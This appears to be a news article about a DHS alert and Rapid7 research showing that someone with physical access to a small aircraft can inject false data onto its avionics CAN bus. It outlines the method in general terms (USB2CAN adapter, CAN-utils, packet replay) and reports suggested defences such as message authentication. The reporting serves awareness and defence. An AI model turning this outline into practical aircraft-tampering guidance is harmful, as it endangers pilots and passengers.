Hackers with physical access to small aircraft can easily hack the plane’s CAN bus system and take control of key navigation systems.

The Department of Homeland Security issued an alert Tuesday warning that small aircraft are vulnerable to hackers that can gain physical access to a plane. It warned that a hacker can easily manipulate aircraft telemetry data, which can result in loss of control of the airplane.

The bulletin was issued after researchers at Rapid 7 released a lengthy report on the ease with which a malicious actor can gain access to an aircraft’s Controller Area Network (CAN) bus and hack it. A CAN bus is a piece of hardware used by automobiles and small aircraft that allow microcontrollers and devices to communicate with each other in applications, in the absence of a host computer.

In its security alert, the DHS’ Cybersecurity and Infrastructure Security Agency drew from the Rapid 7 report, stating, “An attacker with physical access to the aircraft could attach a device to an avionics CAN bus that could be used to inject false data, resulting in incorrect readings in avionic equipment.” CAN bus hacking is behind multiple hacks of cars — including researchers Chris Valasek and Charlie Miller’s famous hack of a Jeep in 2014. Since then, automobile CAN buses have been compromised to take control over a number of cars, including those made by Tesla and Volkswagen.

When it comes to small aircraft, Patrick Kiley, senior security consultant and penetration tester with Rapid 7 and the author of the report, points out that “modern aircraft systems are becoming increasingly reliant on networked communications systems to display information to the pilot as well as control various systems aboard aircraft.”

That includes no direct mechanical linkage between a pilot’s controls; such as wing flaps, trim, the engine and the autopilot system. “This is similar to how most modern automobiles no longer have a physical connection between the throttle and the actuator that causes the engine to accelerate,” he wrote.

As part of its investigation, Rapid 7 looked at two commercially available avionic systems and successfully sent false data to both, feeding the pilot bogus engine telemetry readings, incorrect compass and altitude readings (formerly known as the gyro horizon), fake airspeed and critical angle of attack data. Researchers did not reveal the names of the avionics vendors.

“Such an attacker could attach a device—or co-opt an existing attached device—to an avionics CAN bus in order to inject false measurements and communicate them to the pilot,” Kiley wrote. He also emphasized that physical access to the airplane is a prerequisite for the hack.

Hack Details and Mitigation Suggestions

The research involved using a USB2CAN device connected to the targeted CAN bus. Next, using the Linux operating system running CAN-utils, researchers were able to see the avionics instructions.

“The system was reverse-engineered by sending individual recorded CAN packets back onto the avionics bus and observing what effects they had with the various nodes,” according to the researcher. “This reversing technique is particularly effective in CAN bus explorations compared to other networking environments, since CAN bus implementations are often susceptible to replay attacks.”

Through a series of replay messages along with crafted messages, Rapid7 was able to generate incorrect attitude, headings data, airspeed and much more.

“An attack against the autopilot and attitude indicator could lead to an unusual attitude and potentially loss of control of the aircraft, given that forged CAN bus messages can create disastrous scenarios very quickly,” researchers wrote.

To prevent this type of hacking, Rapid7 is suggesting the aeronautics industry steal a page from automakers. In automotive networking, there have been significant efforts to mitigate against malicious CAN bus networking, researchers said. Some of those mitigation efforts have included CAN bus-specific filtering, whitelisting and firewalls.

“[Those automobile efforts] do not appear to have gotten much traction in avionics networking, at least in the avionics systems favored by pilots of small aircraft,” Kiley wrote. He recommended that a message authentication protocol for the “open ended nature of CAN bus” would strengthen defenses. He also suggested an increase, from eight bytes to 64, when it comes to Flexible Data-Rates (CAN FD), which dictate the speed and the amount of data processed by the avionics CAN.

“Some of that extra space can now be used for security-critical features such as replay protection and cryptographic hashing,” he wrote.

Rapid7 plans to discuss its findings further next week at Aviation Village at DEF CON 27, taking place Aug. 8 through 11. Be sure to follow all DEF CON 27 and Black Hat coverage right here at Threatpost starting next week.